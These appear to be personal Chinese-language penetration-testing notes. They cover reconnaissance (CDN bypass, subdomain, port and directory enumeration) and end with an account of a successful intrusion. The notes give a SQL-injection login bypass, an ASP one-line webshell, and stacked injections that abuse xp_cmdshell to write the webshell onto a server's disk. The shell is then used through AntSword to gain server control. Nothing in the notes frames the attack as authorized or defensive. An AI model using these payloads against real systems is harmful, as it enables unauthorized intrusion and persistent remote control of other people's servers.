渗透过程
信息收集
1.IP信息
17CE
看是否存在cdn
存在的话,查找真实ip
- 从国外去访问,查看ip信息
- 去掉www,然后查看ip信息
2.旁站信息
-
webscan.cc
-
站长之家
3.C段信息
-
webscan.cc
-
站长之家
4.子域名信息
- layer子域名挖掘机
- subdomain
5.端口信息
- nmap
- portscan
6.网站目录信息
- dirsearch
- dirb
目的是扩大攻击面,寻找防护薄弱点和可利用信息
寻找可能存在漏洞的地方
-
登陆界面 可能存在sql注入,可以先使用admin' or 1=1 --+ 之类的语句尝试绕过
-
搜索界面 可能存在sql注入和存储型和DOM型xss等
-
上传界面 可以上传一些木马之类东西:
eg:上传一句话木马,然后使用中国蚁剑去连接(中国菜刀没有中国蚁剑好用!!)
-
涉及密码或者其它敏感信息的地方 可以进行抓包分析,查看请求包和响应包,看一下有没有什么可以利用的信息,或者有可以修改的参数之类的东西,如果有进行修改,理解每个参数的意义和变化
一次成功的经验
收集信息发现子域名信息,找到一个可以利用的ip,进行端口扫描和网站目录爆破,发现后台管理界面,尝试万能密码进行绕过,成功,里面没有什么可以利用的信息,然后寻找上传接口,然后发现可以从登陆界面上传文件,
一句话木马:
<%execute(request("kxc"))%>
mysql开启存储过程
exec master..xp_cmdshell
echo中使用^转义特殊字符
ss' ;exec master..xp_cmdshell "echo dfvdf > D:\\KEFU\\a.asp"; --+
定义一个变量,然后将变量输入到文件中
sa';declare @cmd sysname set @cmd = 'echo ^<^%execute^(request^("kxc"^)^)^%^> > D:\KEFU\1.asp' exec master..xp_cmdshell @cmd;--+
然后使用中国蚁剑连接,可以获得服务器shell